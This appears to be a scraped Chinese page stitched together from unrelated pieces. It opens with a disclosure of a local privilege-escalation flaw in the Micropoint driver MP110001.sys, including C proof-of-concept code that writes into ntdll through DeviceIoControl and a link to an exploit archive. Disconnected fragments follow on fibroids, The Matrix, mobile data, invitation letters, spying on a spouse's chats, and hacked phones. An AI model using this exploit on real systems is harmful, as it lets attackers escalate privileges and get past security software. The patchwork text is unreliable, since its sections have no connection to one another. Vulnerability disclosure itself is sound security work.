微点主动防御是一款号称使用行为分析技术实时保护的主动防御软件。 其核心驱动MP110001.SYS最新版本存在本地权限提升漏洞,可导致任何权限的用户在本地提升权限到SYSTEM权限,绕过UAC等保护。同时也可以利用此漏洞注入到任何受保护进程,从而穿透防火墙、主动防御软件。 出问题的组件:MP110001.sys,版本号:1.2.10006 CheckSum = 0x00009F60 TimeStamp = 0x43620505 该驱动提供了一个接口,允许RING3程序将一块数据COPY到地址0-0x80000000的任意 地址,在写入时会将寄存器CR0的第16位置0,此时CPU的页保护机制就会失效,WINDOWS NT 的CopyOnWrite机制也将失效,RING3程序可以将内存写入到系统模块,例如kernel32.dll, user32.dll的地址,改写它们的代码,此时对系统DLL代码的改写会在所有进程体内同时生效. 通过这一接口,任何权限的RING3程序就可以HOOK或旁路系统任何进程的函数调用,从而进行权限提升,如果HOOK进主动防御、防火墙等的进程体内,则可绕过主动防御软件的保护。 测试代码:HANDLE hdev = CreateFile("\\\\.\\MP110001" ,FILE_READ_ATTRIBUTES ,FILE_SHARE_READ |FILE_SHARE_WRITE ,0,OPEN_EXISTING ,0,0); if (hdev == INVALID_HANDLE_VALUE){ CHAR xx[100];sprintf(xx , "create err = %u\n" , GetLastError());MessageBox(xx, 0 , 0 );return ;} CHAR xx[] = "hello mp!"; HMODULE p = GetModuleHandle("ntdll.dll"); ULONG btr ; BOOL bret = DeviceIoControl(hdev ,0x220007,(PVOID)((ULONG)p + 2 ),strlen(xx)+1 ,xx,0,&btr ,0); CloseHandle(hdev); 测试代码会向NTDLL.DLL的DOS头第二个字节开始写入一个字符串“hello mp",此修改将在系统任何进程体内生效,可使用OD、WINDBG,WINHEX等工具查看 测试程序下载:http://mj0011.ys168.com 漏洞演示目录下LOCALexp_MP.rar
虽然子宫肌瘤是生长在生殖系统内的最为高发的肿瘤,却并不会给患者带来太大的伤害。首先因为子宫肌瘤是由于肌细胞增生而导致的,所以基本上子宫肌瘤发生有恶化成癌细胞的风险很低。而且子宫肌瘤的生长也是极其缓慢的...
本文目录一览: 1、求 黑客帝国动画版 百度网盘免费资源链接,谢谢 2、黑客帝国动画版剧情介绍? 3、谁有黑客帝国动画版全集的资源啊? 4、《黑客帝国动画版》免费在线观看完整版高清,求百度...
断粮断水断电三日,我可能还能好好活着,断网三日估计会把人逼疯。可见网络对人的重要性。然鹅,现在的运营商不知道搞什么什么鬼,为什么我这一个月3G的巨额流量,还特么天天爆! 所谓上有政策下有对策,运营商...
请柬 1.标题 双柬帖封面印上或写明“请柬”二字,一般应做些艺术加工,即回收名家信法,字面烫金或加以图案装饰等。有些单柬帖,“请柬”二字写在顶端第一行,字。。 有谁能提供宣布会的邀请函及范文...
怎么查我老公的邮箱聊天记录我想恢复老公的微信聊天记录冷笑话集锦(21个超级冷笑话)第一,自打买来商业保险,就会有信心横穿马路无需看交通信号灯。 第二,在你好看的情况下照照镜。终究这类幻觉并并不是...
一、手机被黑客控制怎么解除(手机浏览网站时黑客能控制你的摄像头)方法总结 1、手机被黑客控制怎么办?把所有的关联账户通通取消:Google、Twitter、Facebook,这些我们通常会拿来记住密...